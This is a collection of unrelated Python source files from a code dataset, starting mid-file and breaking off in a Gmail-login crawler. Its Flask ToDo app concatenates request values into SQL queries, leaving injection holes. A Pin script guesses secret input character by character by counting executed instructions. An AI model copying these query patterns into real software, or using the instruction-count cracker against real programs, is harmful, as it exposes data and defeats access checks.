args.aggro_da:\n print(\"Aggro DA\")\n tr_transforms = get_train_transform_aggro(patch_size)\n\n\nelse:\n print(\"Not aggro DA\")\n #tr_transforms = get_train_transform(patch_size, noise=\"Riccian\")\n tr_transforms = get_train_transform(patch_size)\n\n\n\n# finally we can create multithreaded transforms that we can actually use for training\n# we don't pin memory here because this is pytorch specific.\ntr_gen = MultiThreadedAugmenter(train_dl, tr_transforms, num_processes=4, # num_processes=4\n num_cached_per_queue=3,\n seeds=None, pin_memory=False)\n# we need less processes for vlaidation because we dont apply transformations\nval_gen = MultiThreadedAugmenter(val_dl, None,\n num_processes=max(1, 4 // 2), # num_processes=max(1, 4 // 2)\n num_cached_per_queue=1,\n seeds=None,\n pin_memory=False)\n\n#%%\ntr_gen.restart()\nval_gen.restart()\n\n#%%\nif args.multi_class:\n num_classes = 4\nelse:\n num_classes = 1\n\n\nif args.num_channels == 3:\n print(\"Original Albunet3D\")\n net_3d = AlbuNet3D34(num_classes=num_classes, pretrained=args.pretrained, is_deconv=True)\n\nelif args.num_channels == 4:\n print(\"4 channel Albunet3D\")\n print(f\"Initialize weights status: {args.weight_init}\")\n net_3d = AlbuNet3D34_4channels(num_classes=num_classes, pretrained=args.pretrained, is_deconv=True,updated=args.weight_init)\n\n\n\n#%%\nloss_fn = GeneralizedDiceLoss() if args.multi_class else SimpleDiceLoss()\nmetric = dice_multi_class if args.multi_class else dice\n\n# print(f\"Training batch size is: {args.training_batch_size}\")\n# print(f\"Validation batch size is: {args.validation_batch_size}\")\nprint(f\"Training for {args.epochs} epochs\")\n\nmodel_trainer = ModelTrainer(args.name, net_3d, tr_gen, val_gen, loss_fn, metric,\n lr=args.learning_rate, epochs=args.epochs,\n num_batches_per_epoch=args.training_batch_size, num_validation_batches_per_epoch=args.validation_batch_size,\n use_gpu=args.use_gpu, multi_class=args.multi_class) \n\n\nmodel_trainer.run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"458004085","text":"class Solution1:\n def isPalindrome(self, x):\n if x < 0:\n return False\n elif x == 0:\n return True\n else:\n old = x\n target = 0\n while old > 0:\n target = target * 10 + old % 10\n old = old // 10\n return target == x\n\ns = Solution1()\narr = [121,-121,1,22,345,10]\nfor i in range(0,len(arr)):\n print(s.isPalindrome(arr[i]))","sub_path":"src/session1/q009_palindrome_number/Solution1.py","file_name":"Solution1.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"225212368","text":"#!/bin/env/python\nimport pygame\nfrom pygame.locals import *\nimport shapes_center\nimport sys\nimport math\n\ndef get_pos(degree, radius, xCenter, yCenter):\n assert degree <= 360.0 # not needed mathmatically.\n theta = math.radians(degree)\n #r = radius * math.cos(n * theta)\n r = radius * math.tan(1*theta)\n x = xCenter + r * (math.cos(theta) + math.tan(theta) )\n y = yCenter + r * (math.sin(theta) - math.tan(3*theta) )\n\n# x = xCenter + math.cos(x) * math.cos(y) * radius\n# y = yCenter + math.sin(x) * math.sin(y) * radius\n\n if x < -200: x = -200\n if x > 2000: x = 2000\n if y > 1500: y = 1500\n if y < -200: y = -200\n\n return ( int(x), int(y))\n\ndef main(resolution, fullscreen=False, num_objects=24, radius=300):\n #radius = int (9.0 * float(resolution[1] / num_circles))\n res_x_half = resolution[0] / 2\n res_y_half = resolution[1] / 2\n # start everything\n pygame.init()\n if fullscreen:\n screen = pygame.display.set_mode(resolution, FULLSCREEN)\n else:\n screen = pygame.display.set_mode(resolution, DOUBLEBUF)\n pygame.mouse.set_visible(False)\n pygame.display.set_caption(\"squares\")\n\n # start everything else\n clock = pygame.time.Clock()\n count = 0\n clock_tick = 30\n degrees = [0.0] * num_objects # array_fill\n degree_step = 0.05\n c1 = pygame.color.Color(\"red\")\n c2 = pygame.color.Color(\"white\")\n while count < 360.0/degree_step:\n clock.tick(clock_tick)\n\n for event in pygame.event.get():\n if event.type == QUIT or event.type == KEYDOWN:\n pygame.quit(); sys.exit();\n\n screen.fill(c1)\n\n# pygame.draw.circle(screen, white, (res_x_half, res_y_half), radius, 1)\n\n for i in range(num_objects):\n r = (i+1) * 5\n pos = get_pos(degrees[i], radius, res_x_half, res_y_half)\n pos2 = (pos[0]+2, pos[1]+2)\n #pygame.draw.circle(screen, pygame.color.Color(\"blue\"), pos, r, 2)\n #pygame.draw.circle(screen, pygame.color.Color(\"green\"), pos2, r, 2)\n #shapes_center.square(screen, pygame.color.Color(\"green\"), pos, r, 2)\n #shapes_center.square(screen, pygame.color.Color(\"green\"), pos, r/2, 2)\n #shapes_center.octagon(screen, pygame.color.Color(\"yellow\"), pos, r, 2)\n shapes_center.hexagon(screen, c2, pos, r, 5)\n\n pygame.display.update()\n\n # want to pause when circle 0 is at a multiple of 30deg\n # count x 20 = 1 degree ; 20 * 30 = 600\n# if count % (20 * clock_tick) == 0:\n# pygame.time.delay(1000)\n# count += 1\n\n\n for i in range(num_objects):\n degrees[i] += float(i+1) * degree_step\n if degrees[i] > 360.0: degrees[i] -= 360.0\n count += 1\n if count % 3 == 0:\n t = c1\n c1 = c2\n c2 = t\n\nif __name__ == '__main__':\n #main(resolution=(1024,768), fullscreen=True, num_objects=24, radius=240)\n #main(resolution=(1440,900), fullscreen=False, num_objects=24, radius=320)\n main(resolution=(1920,1024), fullscreen=True, num_objects=24, radius=280)\n","sub_path":"python/graphics/square-05.py","file_name":"square-05.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"530072884","text":"from collections import defaultdict\nfrom Matchmaster import Matchmaster\nfrom operator import itemgetter\nfrom Player import Player\nimport itertools\nimport os\nimport os.path\nimport sys\nimport traceback\n\nclass Gamemaster():\n def __init__(self, iterations):\n self.players = {}\n self.player_ids = []\n self.matches = []\n self.overall_points = defaultdict(int)\n self.iterations = iterations\n self.match_results = []\n\n def add_player(self, player_id, source_code):\n self.players[player_id] = Player(player_id=player_id, source_code=source_code)\n self.player_ids.append(int(player_id))\n\n def generate_matches(self):\n combinations = itertools.combinations(self.player_ids, 2)\n for pair in combinations:\n self.matches.append(pair)\n self.matches = self.matches * 1\n\n def start_tournament(self):\n for match in self.matches:\n # print '----- Match between ', match, ' begins -----'\n matchmaster = self.start_match(match)\n\n points = matchmaster.points\n\n outcome = zip(match, points)\n\n for player_id, pts in outcome:\n self.overall_points[player_id] += pts\n # print 'The Score was ', outcome\n # print '----- Match between ', match, ' ended -----'\n\n self.match_results.append(matchmaster.get_match_data())\n\n def start_match(self, match):\n matchmaster = Matchmaster(player_1=self.players[match[0]],\n player_2=self.players[match[1]],\n iterations=self.iterations)\n # try:\n matchmaster.start_match()\n # except InvalidActionError as e:\n # self.overall_points[e.player_id] += 1000\n # print e.player_id, 'returned an invalid action!'\n # except Exception as e:\n # self.handle_match_error(match)\n\n return matchmaster\n\n # def handle_match_error(self, match):\n # tb = sys.exc_info()[2]\n # stack = traceback.extract_tb(tb)\n # crasher = None\n # for s in stack:\n # print s\n # if s[2] == 'decide':\n # crasher = s\n # if crasher:\n # crasher = os.path.splitext(os.path.basename(crasher[0]))[0]\n # print crasher, ' Crashed!'\n # player_id = int(crasher)\n # self.overall_points[player_id] += 1000\n # else:\n # print \"Match crashed, but unable to determine crasher\"\n\n def get_overall_points(self):\n return sorted(self.overall_points.iteritems(), key=itemgetter(1), reverse=True)\n\n def get_winner(self):\n return max(self.overall_points, key=lambda k: self.overall_points[k])\n\n def get_match_results(self):\n return self.match_results","sub_path":"tourney/Gamemaster.py","file_name":"Gamemaster.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"199226314","text":"# -*- coding:utf-8 -*-\nfrom flask import Flask, request, render_template, url_for, session, jsonify, redirect, json, make_response\nfrom flaskext.mysql import MySQL\nfrom flask_sslify import *\nimport lepl.apps.rfc3696\nimport json\nimport os\nfrom passlib.hash import pbkdf2_sha256\nfrom jinja2 import utils\nfrom datetime import datetime\n\ntmp_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates')\nemail_validator = lepl.apps.rfc3696.Email()\nmysql = MySQL()\napp = Flask(__name__, template_folder=tmp_dir)\nsslify = SSLify(app)\napp.config.from_pyfile('my.cfg')\nmysql.init_app(app)\napp.secret_key = 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT'\n\n\n@app.route(\"/\")\ndef top():\n return render_template(\"top.html\")\n\n\n@app.route(\"/register\", methods=['POST'])\ndef register():\n from flask import request\n if request.method == 'POST':\n name = str(utils.escape(request.json['name']))\n email = str(utils.escape(request.json['email']))\n password = pbkdf2_sha256.hash(request.json['pass'])\n if len(name) != 0 and len(email) != 0 and len(password) != 0:\n if email_validator(email):\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM User WHERE username = '\" + name + \"'\")\n data = cursor.fetchone()\n if data is None:\n cursor.execute('INSERT INTO User(username,email,password) VALUES(%s,%s,%s)',\n [name, email, password])\n conn.commit()\n return \"登録できました!\"\n else:\n return \"すでに同じユーザーネームのユーザーが存在します\"\n else:\n return \"正しいメールアドレスではありません\"\n else:\n return \"空のフィールドが存在します\"\n\n\n@app.route(\"/login\")\ndef login():\n return render_template(\"login.html\")\n\n\n@app.route(\"/logout\")\ndef logout():\n session.pop('username', None)\n session.pop('msg', None)\n return redirect(url_for('login'))\n\n\n@app.route(\"/index\")\ndef index():\n if 'username' not in session:\n return redirect(url_for('top'))\n else:\n return render_template(\"index.html\")\n\n\n@app.route(\"/auth\", methods=['POST'])\ndef auth():\n from flask import request\n if request.method == 'POST':\n name = str(utils.escape(request.form['name']))\n password = request.form['password']\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM User WHERE username = '\" + name + \"'\")\n data = cursor.fetchone()\n if data is None:\n error = \"登録されていないユーザーです\"\n session['msg'] = error\n return redirect(url_for('login'))\n else:\n if pbkdf2_sha256.verify(password, data[2]) is True:\n session['username'] = name\n return redirect(url_for('index'))\n else:\n error = \"ユーザーネームまたはパスワードが間違っています\"\n session['msg'] = error\n return redirect(url_for('login'))\n\n\n@app.route(\"/add\")\ndef add():\n if 'username' not in session:\n return redirect(url_for('top'))\n else:\n return render_template(\"add.html\")\n\n\n@app.route(\"/taskadd\", methods=['POST'])\ndef taskadd():\n from flask import request\n if request.method == 'POST':\n name = str(utils.escape(session['username']))\n title = str(utils.escape(request.json['title']))\n contents = str(utils.escape(request.json['contents']))\n level = request.json['level']\n period = request.json['period']\n period = period.split(\" - \")\n status = request.json[\"status\"]\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM Task WHERE username = '\" + name + \"'AND title ='\" + title + \"'\")\n data = cursor.fetchone()\n if data is None:\n cursor.execute('INSERT INTO Task (username,title,contents,startp,endp,level,status) '\n 'VALUES(%s,%s,%s,%s,%s,%s,%s)', [name, title, contents, period[0], period[1], level, status])\n conn.commit()\n return \"タスクを登録しました!タスク一覧から確認してください!\"\n else:\n return \"タスク一覧または完了済みタスク一覧に同じタイトルのタスクが存在します\"\n\n\n@app.route(\"/request\", methods=['GET'])\ndef request():\n from flask import jsonify, session\n name = str(utils.escape(session['username']))\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM Task WHERE username = '\" + name + \"'AND status = 'on'\")\n data = cursor.fetchall()\n cursor.close()\n return jsonify(data)\n\n\n@app.route(\"/update\", methods=['POST'])\ndef update():\n from flask import request, jsonify\n if request.method == 'POST':\n name = str(utils.escape(request.json['name']))\n title = str(utils.escape(request.json['title']))\n status = request.json[\"status\"]\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"UPDATE \"\n \"Task SET status ='\" + status + \"'WHERE username ='\" + name + \"'AND title ='\" + title + \"'\")\n conn.commit()\n return \"タスクは完了しました\"\n\n\n@app.route(\"/calendar\")\ndef calendar():\n if 'username' not in session:\n return redirect(url_for('top'))\n else:\n return render_template(\"calendar.html\")\n\n\n@app.route(\"/tasklist\", methods=['GET'])\ndef tasklist():\n from flask import jsonify, session\n name = str(utils.escape(session['username']))\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM Task WHERE username = '\" + name + \"'AND status = 'on'\")\n data = cursor.fetchall()\n response = []\n for value in range(len(data)):\n start = data[value][3]\n end = data[value][4]\n level = data[value][5]\n if level == \"最重要\":\n bgcolor = \"#dd4b39\"\n bodercolor = \"#dd4b39\"\n elif level == \"重要\":\n bgcolor = \"#f39c12\"\n bodercolor = \"#f39c12\"\n else:\n bgcolor = \"#3c8dbc\"\n bodercolor = \"#3c8dbc\"\n\n start = start.split(\"/\")\n end = end.split(\"/\")\n response.append({\n \"title\": data[value][1],\n \"start\": start[2] + \"-\" + start[0] + \"-\" + start[1],\n \"end\": end[2] + \"-\" + end[0] + \"-\" + end[1],\n \"backgroundColor\": bgcolor,\n \"borderColor\": bodercolor\n })\n cursor.close()\n return jsonify(response)\n\n\n@app.route(\"/completed\")\ndef completed():\n if 'username' not in session:\n return redirect(url_for('top'))\n else:\n return render_template(\"complete.html\")\n\n\n@app.route(\"/complist\", methods=['GET'])\ndef complist():\n from flask import jsonify, session\n name = str(utils.escape(session['username']))\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM Task WHERE username = '\" + name + \"'AND status = 'off'\")\n data = cursor.fetchall()\n return jsonify(data)\n\n\n@app.route(\"/remove\", methods=['POST'])\ndef remove():\n from flask import request, jsonify\n if request.method == 'POST':\n name = str(utils.escape(request.json['name']))\n title = str(utils.escape(request.json['title']))\n print(title)\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"DELETE FROM Task WHERE username ='\" + name + \"'AND title ='\" + title + \"'\")\n conn.commit()\n return \"タスクは削除されました\"\n\n\n@app.route(\"/setting\")\ndef setting():\n if 'username' not in session:\n return redirect(url_for('top'))\n else:\n return render_template(\"setting.html\")\n\n\n@app.route(\"/register_endpoint\", methods=['POST'])\ndef register_endpoint():\n from flask import request, jsonify\n if request.method == 'POST':\n name = str(utils.escape(request.json['name']))\n state = str(request.json['state'])\n endpoint = request.json['endpoint']\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"UPDATE User SET \"\n \"push_endpoint ='\" + endpoint + \"',push_state ='\" + state + \"' WHERE username ='\" + name + \"'\")\n conn.commit()\n return \"OK\"\n\n\n@app.route(\"/user_state\", methods=['GET'])\ndef user_state():\n name = str(utils.escape(session['username']))\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM User WHERE username = '\" + name + \"'\")\n data = cursor.fetchall()\n return jsonify(data)\n\n\n@app.route(\"/update_state\", methods=['POST'])\ndef update_state():\n from flask import request, jsonify\n if request.method == 'POST':\n name = str(utils.escape(request.json['name']))\n state = str(request.json['state'])\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"UPDATE User SET push_state ='\" + state + \"' WHERE username ='\" + name + \"'\")\n conn.commit()\n return \"OK\"\n\n\n@app.route(\"/fetch\", methods=['POST'])\ndef fetch():\n from flask import request, jsonify\n if request.method == 'POST':\n endpoint = request.json['end_point']\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM User WHERE push_endpoint = '\" + endpoint + \"' AND push_state = 'True'\")\n data = cursor.fetchall()\n cursor.execute(\"SELECT * FROM Task WHERE username = '\" + data[0][0] + \"' AND status = 'on'\")\n push_data = cursor.fetchall()\n today_do = []\n today_do_str = \"\"\n any_do = []\n any_do_str = \"\"\n d = datetime.today()\n year = int(d.year)\n month = int(d.month)\n day = int(d.day)\n date = datetime(year, month, day)\n for i in range(len(push_data)):\n date2 = push_data[i][4].split(\"/\")\n date2 = datetime(int(date2[2]), int(date2[0]), int(date2[1]))\n if date2 == date:\n today_do.append(\"・\" + push_data[i][1] + \"\\n\")\n today_do_str += \"・\" + push_data[i][1] + \"\\n\"\n else:\n any_do.append(\"・\" + push_data[i][1] + \"\\n\")\n any_do_str += \"・\" + push_data[i][1] + \"\\n\"\n\n if len(push_data) != 0:\n data = {\n \"title\": \"ToDo\",\n \"body\": \"[今日が締め切りのタスク\" + str(len(today_do)) + \"件]\\n\" +\n today_do_str + \"[締め切り外のタスク\" + str(len(any_do)) + \"件]\\n\" + any_do_str,\n \"url\": \"https://todo.ydsteins.tk/login\"\n }\n return jsonify(data)\n else:\n data = {\n \"title\": \"ToDo\",\n \"body\": \"まずはタスクを登録してみましょう!\",\n \"url\": \"https://todo.ydsteins.tk/login\"\n }\n return jsonify(data)\n\nif __name__ == \"__main__\":\n app.run(debug=app.config['DEBUG'])\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"632007276","text":"import _plotly_utils.basevalidators\n\n\nclass LabelValidator(_plotly_utils.basevalidators.CompoundValidator):\n def __init__(self, plotly_name=\"label\", parent_name=\"layout.newshape\", **kwargs):\n super(LabelValidator, self).__init__(\n plotly_name=plotly_name,\n parent_name=parent_name,\n data_class_str=kwargs.pop(\"data_class_str\", \"Label\"),\n data_docs=kwargs.pop(\n \"data_docs\",\n \"\"\"\n font\n Sets the new shape label text font.\n padding\n Sets padding (in px) between edge of label and\n edge of new shape.\n text\n Sets the text to display with the new shape.\n textangle\n Sets the angle at which the label text is drawn\n with respect to the horizontal. For lines,\n angle \"auto\" is the same angle as the line. For\n all other shapes, angle \"auto\" is horizontal.\n textposition\n Sets the position of the label text relative to\n the new shape. Supported values for rectangles,\n circles and paths are *top left*, *top center*,\n *top right*, *middle left*, *middle center*,\n *middle right*, *bottom left*, *bottom center*,\n and *bottom right*. Supported values for lines\n are \"start\", \"middle\", and \"end\". Default:\n *middle center* for rectangles, circles, and\n paths; \"middle\" for lines.\n xanchor\n Sets the label's horizontal position anchor\n This anchor binds the specified `textposition`\n to the \"left\", \"center\" or \"right\" of the label\n text. For example, if `textposition` is set to\n *top right* and `xanchor` to \"right\" then the\n right-most portion of the label text lines up\n with the right-most edge of the new shape.\n yanchor\n Sets the label's vertical position anchor This\n anchor binds the specified `textposition` to\n the \"top\", \"middle\" or \"bottom\" of the label\n text. For example, if `textposition` is set to\n *top right* and `yanchor` to \"top\" then the\n top-most portion of the label text lines up\n with the top-most edge of the new shape.\n\"\"\",\n ),\n **kwargs,\n )\n","sub_path":"contrib/python/plotly/py3/plotly/validators/layout/newshape/_label.py","file_name":"_label.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"219439841","text":"import numpy as np\r\nimport pickle\r\nfrom settings import e\r\nfrom settings import s\r\nfrom random import shuffle\r\nfrom agent_code.my_agent.feature_extraction import *\r\nfrom agent_code.my_agent.algorithms import new_reward, q_gd_linapprox\r\n\r\n\r\n#########################################################################\r\n\r\ndef setup(self):\r\n \r\n self.actions = [ 'UP', 'DOWN', 'LEFT', 'RIGHT', 'BOMB', 'WAIT' ]\r\n #self.train_mode = \"Greed_batch_test\"\r\n self.init_mode = \"handpicked_init\"\r\n #self.init_mode = 'init1'\r\n self.alpha_set = \"const0.2\"\r\n # load weights\r\n try:\r\n self.weights = np.load('agent_code/my_agent/models/.npy')\r\n #self.training_weights = np.load('train_weights_{}_{}_{}.npy'.format(self.train_mode, self.init_mode, self.alpha_set))\r\n #self.training_rewards = np.load('train_rewards_{}_{}_{}.npy'.format(self.train_mode, self.init_mode, self.alpha_set))\r\n print(\"weights loaded\")\r\n except:\r\n self.weights = []\r\n self.training_weights = []\r\n self.training_rewards = []\r\n print(\"no weights found ---> create new weights\")\r\n\r\n # Define Rewards\r\n self.total_R = 0\r\n self.reward_round = 0\r\n \r\n # Step size or gradient descent \r\n self.alpha = 0.2\r\n self.gamma = 0.95\r\n self.EPSILON = 0.2\r\n self.round = 1\r\n \r\n self.history = []\r\n \r\n \r\n#####################################################################\r\n\r\ndef act(self):\r\n \r\n \r\n \"\"\"\r\n actions order: 'UP', 'DOWN', LEFT', 'RIGHT', 'BOMB', 'WAIT' \r\n \"\"\"\r\n \r\n # load state \r\n game_state = self.game_state \r\n #print(\"step {}\".format(game_state['step']))\r\n\r\n # Compute features state \r\n F = RLFeatureExtraction(self.game_state)\r\n feature_state = F.state()\r\n self.prev_state = feature_state\r\n \r\n #different initial guesses can be defined here: \r\n if len(self.weights) == 0:\r\n print('no weights, init weights')\r\n if self.init_mode == 'handpicked_init':\r\n self.weights = np.array([-15, 1.5, -81, -2, 10, -1, 3.5, 1.7, 0.8, 0.8, 1.5, 2, 13, -10, 2, 2])\r\n elif self.init_mode == 'init1':\r\n self.weights = np.ones(feature_state.shape[1]) \r\n elif self.init_mode == 'initRand':\r\n self.weights = np.random.rand(self.prev_state.shape[1])\r\n \r\n #print(self.weights)\r\n self.logger.info('Pick action')\r\n \r\n # Linear approximation approach\r\n q_approx = np.dot(feature_state, self.weights) \r\n best_actions = np.where(q_approx == np.max(q_approx))[0] \r\n shuffle(best_actions)\r\n\r\n q_next_action = self.actions[best_actions[0]] #GREEDY POLICY\r\n self.next_action = q_next_action\r\n self.prev_action = self.next_action\r\n \r\n #print(\"q action picked \", q_next_action)\r\n \r\n \r\n#####################################################################\r\n\r\ndef reward_update(self):\r\n\r\n self.logger.info('IN TRAINING MODE ')\r\n if self.game_state['step']>1:\r\n #print('LEARNING')\r\n \r\n reward = new_reward(self.events)\r\n self.total_R += reward \r\n self.reward_round += reward\r\n \r\n hist_entry = {'state': self.prev_state, 'action': self.prev_action, 'reward':reward}\r\n self.history.append(hist_entry)\r\n \r\n #print(hist_entry)\r\n \r\n#####################################################################\r\n\r\ndef end_of_episode(self):\r\n \r\n print(\"end of round {}\".format(self.round))\r\n self.round += 1\r\n #reset alpha for next round\r\n self.alpha = 0.2\r\n \r\n ## calculate new rewards \r\n reward = new_reward(self.events)\r\n self.total_R += reward \r\n self.reward_round += reward\r\n \r\n\r\n \r\n hist_entry = {'state': self.prev_state, 'action': self.prev_action, 'reward':reward}\r\n self.history.append(hist_entry)\r\n\r\n ################ LEARNING \r\n\r\n print('total reward from this round: {}'.format(self.reward_round))\r\n print('total r: {}'.format(self.total_R))\r\n self.reward_round = 0 \r\n \r\n temp_weights = np.zeros(14)\r\n\r\n for i in range(len(self.history)-1):\r\n\r\n weights = self.weights\r\n prev_state = self.history[i]['state']\r\n prev_action = self.history[i]['action']\r\n next_state = self.history[i+1]['state']\r\n next_action = self.history[i+1]['action']\r\n\r\n prev_sa = prev_state[self.actions.index(prev_action),:]\r\n next_sa = next_state[self.actions.index(next_action),:]\r\n \r\n temp = (reward + self.gamma * np.dot(next_sa,weights) - np.dot(prev_sa,weights)) * (np.dot(prev_sa,weights)-np.dot(next_sa, weights))* weights\r\n\r\n temp_weights += temp\r\n\r\n temp_weights = (-self.alpha) * (temp_weights/len(self.history))\r\n print('new weights = {}'.format(weights + temp_weights))\r\n self.weights += temp_weights\r\n self.weights /= np.sum(self.weights)\r\n\r\n \r\n\r\n ############## SAVING LEARNING FROM ONE EPISODE \r\n #np.save('weights_{}_{}_{}.npy'.format(self.train_mode, self.init_mode, self.alpha_set), self.weights)\r\n\r\n self.training_weights = np.append(self.training_weights, self.weights)\r\n #np.save('train_weights_{}_{}_{}.npy'.format(self.train_mode, self.init_mode, self.alpha_set), self.training_weights)\r\n \r\n self.training_rewards = np.append(self.training_rewards, self.total_R)\r\n #np.save('train_rewards_{}_{}_{}.npy'.format(self.train_mode, self.init_mode, self.alpha_set), self.training_rewards)\r\n\r\n\r\n ################# RESET PARAMETERS FOR NEXT ROUND\r\n if self.round%10 == 0:\r\n self.total_R = 0\r\n \r\n\r\n","sub_path":"agent_code/MR_Bombastic/residual_weights/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":5587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"123560550","text":"from multiprocessing.pool import Pool\nfrom multiprocessing import cpu_count\nimport subprocess\nimport sys\nfrom config import PIN, MAX_NUM, MIN_NUM\n\n\ndef call_proc(cmd):\n \"\"\" This runs in a separate thread. \"\"\"\n # subprocess.call(shlex.split(cmd)) # This will block until cmd finishes\n p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = p.communicate()\n return (out, err)\n\n\nclass Pin(object):\n def __init__(self, INSCOUNT, filename, target_addr):\n self.filename = filename\n self.result = ''\n self.INSCOUNT = INSCOUNT\n self.target_addr = str(int(target_addr, 16))\n\n def run_pin(self, args):\n pool = Pool(cpu_count()) #获取cpu个数\n results = []\n for each_args in args:\n command = 'echo {} | {} -t {} -a {} -- {}'.format(each_args[1], PIN, self.INSCOUNT, self.target_addr,\n self.filename)\n result = pool.apply_async(call_proc, (command,))\n results.append((each_args[0], each_args[1], result))\n deal_result = []\n # io流最后处理\n for each in results:\n out, err = each[2].get()\n count = int(out.decode().split(\"Count:\")[1], 10)\n deal_result.append([each[0], each[1], count])\n pool.close()\n pool.join()\n diff = deal_result[0][2]\n for i in deal_result:\n i.append(i[2] - diff)\n self.result = deal_result\n\n def get_all_result(self):\n return self.result\n\n def get_equal(self, diff):\n for each in self.result:\n if each[3] == diff:\n return each[0]\n print(\"Not found equal\")\n sys.exit(0)\n\n def get_unequal(self, diff):\n for each in self.result:\n if each[3] != diff:\n return each[0]\n print(\"Not found unequal\")\n sys.exit(0)\n\n def get_below(self, diff):\n for each in self.result:\n if each[3] <= diff:\n return each[0]\n print(\"Not found below\")\n sys.exit(0)\n\n def get_after(self, diff):\n for each in self.result:\n if each[3] >= diff:\n return each[0]\n print(\"Not found after\")\n sys.exit(0)\n\n def get_min(self):\n min_num = MAX_NUM\n index = self.result[0][0]\n for each in self.result:\n if each[3] <= min_num:\n min_num = each[3]\n index = each[0]\n return index\n\n def get_max(self):\n max_num = MIN_NUM\n index = self.result[0][0]\n for each in self.result:\n if each[3] >= max_num:\n max_num = each[3]\n index = each[0]\n return index\n\n def get_diff(self):\n num = []\n charset = []\n for i in self.result:\n num.append(i[3])\n charset.append(i[0])\n temp = [elem for elem in num if num.count(elem) == 1]\n return charset[num.index(temp[0])]\n","sub_path":"Pin.py","file_name":"Pin.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"251100306","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\nfrom odoo.exceptions import ValidationError\n\n\nclass SaleOrder(models.Model):\n _inherit = \"sale.order\"\n\n state = fields.Selection(\n selection_add=[('preorder', \"Pre-order\")]\n )\n ad_po_date = fields.Datetime(\n string=\"Estimated delivery date\",\n default=lambda self: fields.Datetime.now()\n )\n collection_id = fields.Many2one(\n comodel_name=\"product.collection\",\n string=\"Collection\"\n )\n preorder_complete = fields.Boolean(\n string=\"Pre-order Processed\",\n )\n is_preorder = fields.Boolean(\n string=\"Is a Pre-Order\"\n )\n\n @api.onchange('ad_po_date')\n def _set_date(self):\n if self.ad_po_date:\n self.requested_date = self.ad_po_date\n\n @api.multi\n def set_pre_order(self):\n if self.collection_id and self.ad_po_date:\n self.commitment_date = self.ad_po_date\n self.is_preorder = True\n self.action_confirm()\n else:\n raise ValidationError(\n \"Fields Collection and Estimated delivery \"\n \"date on the tab Pre-Order needs to be filled in \"\n )\n","sub_path":"purchase_sale_preorders/models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"152551767","text":"# -*- coding: utf-8 -*-\nimport os\nimport django\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'django_AML.settings')\ndjango.setup()\nfrom datetime import datetime, timedelta\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom crawler_AML.crawler.gmail import gmail_insert_AML\nfrom AML.models import GmailInfo, GmailList\nimport logging.handlers\nimport time\n\n\nhereWork = str('Gmail')\nnow = datetime.now()\ncurrentTime = '%s_%s_%s' % (now.year, now.month, now.day)\n\n# logger 인스턴스를 생성 및 로그 레벨 설정\nlogger = logging.getLogger(hereWork + '_logging')\nlogger.setLevel(logging.DEBUG)\n\n# formatter 생성\nformatter = logging.Formatter('[%(levelname)s|%(filename)s:%(lineno)s] %(asctime)s > %(message)s')\n\n# fileHandler 와 StreamHandler 를 생성\nfile_max_bytes = 10 * 1024 * 1024 # log file size : 10MB\n\nfileHandler = logging.handlers.RotatingFileHandler(\n 'C://Users/micro/DevelopCode_1905/django_aml/crawler_AML/crawler/log/' + hereWork + '_log_'\n + currentTime, maxBytes=file_max_bytes, backupCount=10)\n\nstreamHandler = logging.StreamHandler()\n\n# handler 에 formatter 세팅\nfileHandler.setFormatter(formatter)\nstreamHandler.setFormatter(formatter)\n\n# Handler 를 logging 에 추가\nlogger.addHandler(fileHandler)\nlogger.addHandler(streamHandler)\n\n# logging\nlogging.debug(hereWork + '_crawler_bot_debugging on' + currentTime)\nlogging.info('info')\nlogging.warning('warning')\nlogging.error('error')\nlogging.critical('critical')\n\n\ndef start(origin_ph, user_id, user_pw):\n options = Options()\n options.add_argument(\"--window-size=1920x1080\")\n 